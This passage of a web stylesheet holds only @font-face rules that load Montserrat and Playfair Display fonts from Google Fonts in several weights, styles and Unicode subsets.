format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, 